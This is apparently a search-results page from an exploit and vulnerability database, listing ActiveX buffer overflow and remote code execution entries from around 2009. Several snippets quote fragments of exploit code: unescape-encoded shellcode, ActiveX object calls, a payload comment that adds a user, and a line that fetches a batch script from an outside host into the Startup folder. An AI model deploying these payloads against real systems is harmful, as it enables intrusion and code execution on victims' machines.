293 matches found
Touch22 Image22 ActiveX Control Buffer Overflow
Touch22 Image22 ActiveX is an application to create images for Microsoft Windows. A buffer overflow vulnerability has been discovered in Touch22 Image22 ActiveX. The vulnerability is due to an error in the application that fails to properly bounds check user-supplied data before copying it into a...
AwingSoft Winds3D Player SceneURL Buffer Overflow
This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x WindsPly.ocx v3.6.0.0. This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code...
ActiveX CLSID Detection (deprecated)
Binary data 7020.pasl...
AOL SuperBuddy ActiveX Control Remote Code Execution Vulnerability
This host is installed with AOL ActiveX and is prone to remote code execution vulnerability. OpenVAS Vulnerability Test $Id: gbaolactivexremotecodeexecvuln.nasl 4865 2016-12-28 16:16:43Z teissa $ AOL SuperBuddy ActiveX Control Remote Code Execution Vulnerability Authors: Antu Sanadi Copyright:...
AOL 9.1 SuperBuddy ActiveX Control SetSuperBuddy() remote code execution exploit
!-- AOL 9.1 SuperBuddy ActiveX Control SetSuperBuddy remote code execution exploit IE7/heap spray version by nine:situations:group::trotzkista Is possible to execute arbitrary code by setting the first argument to an overlong url and the second argument to a 16 bytes long string which overwrite...
AOL 9.1 SuperBuddy SetSuperBuddy() Code Execution
Set obj = CreateObject"Sb.SuperBuddy.1" shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +...
Adobe ShockWave Player 11.5.1.601 Stack Overflow
Application: Adobe ShockWave Player 11.5.1.601 Platforms: Windows XP Professional French SP2 and SP3 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher Protek Research Lab's 1 Introduction 2 Technical details and bug 3 The Code =============== 1...
EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow
//executing calc scode = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...
Oracle - Document Capture BlackIce DEVMODE
var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...
Oracle - Document Capture BlackIce DEVMODE
Oracle - Document Capture BlackIce DEVMODE var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +...
HP LoadRunner 9.5 File Creation
' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\..\..\Documents and Settings\All...
Oracle Document Capture BlackIce Stack Buffer Overflow
var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...
Quiksoft EasyMail 6 - AddAttachment Remote Buffer Overflow
Quiksoft EasyMail 6 - AddAttachment Remote Buffer Overflow Quiksoft EasyMail 6 AddAttachment Remote Buffer Overflow Exploit function strrepeat input, multiplier return new Arraymultiplier+1.joininput; //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikataganai ExitFunc: SEH shellcode =...
Adobe Shockwave Player 11.5.1.601 Buffer Overflow
Application: Adobe ShockWave Player 11.5.1.601 Platforms: Windows XP Professional French SP2 and SP3 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher Protek Research Lab's 1 Introduction 2 Technical details and bug 3 The Code =============== 1...
Adobe Shockwave Player 11.5.1.601 - ActiveX Buffer Overflow (PoC)
Application: Adobe ShockWave Player 11.5.1.601 Platforms: Windows XP Professional French SP2 and SP3 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher Protek Research Lab's 1 Introduction 2 Technical details and bug 3 The Code =============== 1...
Adobe ShockWave Player 11.5.1.601 ActiveX Buffer Overflow PoC
Exploit for unknown platform in category dos / poc ============================================================= Adobe ShockWave Player 11.5.1.601 ActiveX Buffer Overflow PoC ============================================================= Application: Adobe ShockWave Player 11.5.1.601 Platforms:...
CVE-2009-3038
A certain ActiveX control in lnresobject.dll 7.1.1.119 in the Research In Motion RIM Lotus Notes connector for BlackBerry Desktop Manager 5.0.0.11 allows remote attackers to cause a denial of service Internet Explorer crash by referencing the control's CLSID in the classid attribute of an OBJECT...
CVE-2009-3038
A certain ActiveX control in lnresobject.dll 7.1.1.119 in the Research In Motion RIM Lotus Notes connector for BlackBerry Desktop Manager 5.0.0.11 allows remote attackers to cause a denial of service Internet Explorer crash by referencing the control's CLSID in the classid attribute of an OBJECT...
Novell Client For Windows 2000/XP Denial Of Service
Application: Novell Client for Windows 2000 and XP Platforms: Windows XP Professional French SP2 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher Protek Research Lab's 1 Introduction 2 Technical details 3 The Code =============== 1 Introduction...
Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service
Application: Novell Client for Windows 2000 and XP Platforms: Windows XP Professional French SP2 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher Protek Research Lab's 1 Introduction 2 Technical details 3 The Code =============== 1 Introduction...